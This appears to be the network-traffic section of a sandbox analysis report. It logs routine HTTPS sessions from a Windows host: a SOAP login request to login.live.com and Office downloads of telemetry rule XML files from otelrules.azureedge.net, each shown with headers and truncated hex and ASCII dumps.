                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:10 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:10 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 472
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                    ETag: "0x8DC582B9DACDF62"
                                                                                                                    x-ms-request-id: b18988de-c01e-0079-2891-3fe51a000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103510Z-174f7845968qj8jrhC1EWRh41s000000114g0000000093rc
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:10 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    56192.168.2.44980440.126.53.19443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:11 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: application/soap+xml
                                                                                                                    Accept: */*
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                    Content-Length: 4775
                                                                                                                    Host: login.live.com
                                                                                                                    2024-11-30 10:35:11 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                    2024-11-30 10:35:12 UTC569INHTTP/1.1 200 OK
                                                                                                                    Cache-Control: no-store, no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Content-Type: application/soap+xml; charset=utf-8
                                                                                                                    Expires: Sat, 30 Nov 2024 10:34:12 GMT
                                                                                                                    P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                    x-ms-route-info: C532_BAY
                                                                                                                    x-ms-request-id: 60a71f73-c84e-429d-b81d-6be33be40bf2
                                                                                                                    PPServer: PPV: 30 H: PH1PEPF00011F3E V: 0
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:11 GMT
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 11410
                                                                                                                    2024-11-30 10:35:12 UTC11410INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    57192.168.2.44980513.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:11 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:12 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:11 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 404
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                    ETag: "0x8DC582B9E8EE0F3"
                                                                                                                    x-ms-request-id: 4ee01645-001e-0017-38b5-420c3c000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103511Z-174f7845968frfdmhC1EWRxxbw00000011b00000000051ap
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:12 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    58192.168.2.44980613.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:12 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:12 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:12 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 468
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                    ETag: "0x8DC582B9C8E04C8"
                                                                                                                    x-ms-request-id: f5817373-b01e-003e-3591-3f8e41000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103512Z-174f7845968qj8jrhC1EWRh41s0000001150000000008fz2
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:12 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    59192.168.2.44980713.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:12 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:12 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:12 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 428
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                    ETag: "0x8DC582BAC4F34CA"
                                                                                                                    x-ms-request-id: b254496e-901e-0016-2991-3fefe9000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103512Z-174f7845968xr5c2hC1EWRd0hn0000000k4000000000663g
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:12 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    60192.168.2.44980813.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:12 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:12 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:12 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 499
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                    ETag: "0x8DC582B98CEC9F6"
                                                                                                                    x-ms-request-id: 89e88ad2-001e-0065-4491-3f0b73000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103512Z-174f7845968frfdmhC1EWRxxbw000000117g0000000095q3
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:12 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    61192.168.2.44980913.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:12 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:12 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:12 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 415
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                    ETag: "0x8DC582B988EBD12"
                                                                                                                    x-ms-request-id: e21e9151-601e-0097-6ab4-42f33a000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103512Z-174f7845968jrjrxhC1EWRmmrs00000011cg000000006r5g
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:12 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    62192.168.2.44981013.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:13 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:14 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:14 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 471
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                    ETag: "0x8DC582BB5815C4C"
                                                                                                                    x-ms-request-id: 6c824192-201e-0051-0a91-3f7340000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103514Z-174f78459685m244hC1EWRgp2c000000111000000000a8zf
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:14 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    63192.168.2.44981113.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:14 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:14 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:14 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 419
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                    ETag: "0x8DC582BB32BB5CB"
                                                                                                                    x-ms-request-id: c3d74fa2-201e-0003-1d91-3ff85a000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103514Z-174f7845968qj8jrhC1EWRh41s000000115g000000007muk
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:14 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    64192.168.2.44981213.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:14 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:14 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:14 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 494
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                    ETag: "0x8DC582BB8972972"
                                                                                                                    x-ms-request-id: 7090c7f2-e01e-000c-3ea1-428e36000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103514Z-174f78459685m244hC1EWRgp2c00000011700000000022n1
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:14 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
